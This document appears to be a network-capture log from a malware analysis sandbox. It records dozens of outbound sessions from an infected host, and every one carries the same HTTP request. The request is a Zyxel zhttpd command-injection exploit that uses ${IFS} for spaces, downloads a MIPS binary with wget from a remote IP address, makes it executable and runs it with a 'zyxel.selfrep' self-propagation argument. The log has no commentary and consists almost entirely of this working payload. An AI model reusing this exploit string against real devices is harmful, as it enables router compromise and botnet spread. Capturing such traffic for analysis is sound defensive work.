                                          Jan 14, 2024 15:46:00.695947886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          431192.168.2.2344136144.241.11.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.695976019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          432192.168.2.235232820.203.177.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.695987940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          433192.168.2.234074063.136.87.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696037054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          434192.168.2.2340864116.129.243.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696069956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          435192.168.2.2336672150.18.140.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696115971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          436192.168.2.233510251.36.152.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696134090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          437192.168.2.235442266.0.120.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696137905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          438192.168.2.2340784211.246.82.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696173906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          439192.168.2.234578220.54.51.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696213961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          440192.168.2.2336190183.102.27.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696230888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          441192.168.2.2358728221.187.94.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696240902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          442192.168.2.2346068195.56.205.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696342945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          443192.168.2.236015212.192.55.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696346045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          444192.168.2.2344352114.52.2.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696346045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          445192.168.2.23604808.209.251.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696346045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          446192.168.2.234995064.115.230.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696367979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          447192.168.2.2346976213.160.88.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696412086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          448192.168.2.2356750152.227.69.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696427107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          449192.168.2.2343356195.191.139.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696449041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          450192.168.2.235861223.233.252.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696470976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          451192.168.2.2359096100.142.145.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696494102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          452192.168.2.2346202193.242.31.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696516991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          453192.168.2.234669285.247.235.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696542025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          454192.168.2.235878874.169.82.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696593046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          455192.168.2.2349578138.199.137.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696645975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          456192.168.2.233651663.163.32.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696675062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          457192.168.2.235543476.64.167.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696682930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          458192.168.2.2342066223.131.119.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696705103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          459192.168.2.233615687.67.228.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696732998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          460192.168.2.2337622196.26.52.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696752071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          461192.168.2.2339598170.87.109.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696774006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          462192.168.2.2346322150.183.9.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696836948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          463192.168.2.234996495.208.170.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696851015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          464192.168.2.2346140119.55.95.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696898937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          465192.168.2.2347756165.126.11.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696906090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          466192.168.2.2358338155.136.117.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696932077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          467192.168.2.2356884185.136.179.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696938992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          468192.168.2.2360980199.123.10.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696970940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          469192.168.2.2340698196.0.215.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.696970940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          470192.168.2.2337812146.192.132.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697001934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          471192.168.2.2352652206.173.163.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697033882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          472192.168.2.2348532174.98.132.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697065115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          473192.168.2.2357706178.98.67.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697093964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          474192.168.2.2356844163.97.127.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697132111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          475192.168.2.235700450.122.23.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697170019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          476192.168.2.2350132122.193.197.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697170019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          477192.168.2.235949218.17.167.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697222948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          478192.168.2.2333908196.172.111.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697252989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          479192.168.2.2348746149.73.177.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697273016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          480192.168.2.234151275.185.97.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697293043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          481192.168.2.2334560185.208.47.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697319984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          482192.168.2.235839077.163.249.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697351933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          483192.168.2.2353592101.246.82.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697384119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          484192.168.2.235138248.108.108.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697396994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          485192.168.2.234118874.163.238.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697417974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          486192.168.2.2354522168.39.117.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697454929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          487192.168.2.234657851.234.165.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697491884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          488192.168.2.235562425.95.132.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697509050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          489192.168.2.2338590171.119.9.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697539091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          490192.168.2.2336064192.185.88.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697561979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          491192.168.2.2350662136.247.180.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697588921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          492192.168.2.235300890.96.222.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.697623014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          493192.168.2.2348318117.137.90.210443
                                          TimestampBytes transferredDirectionData
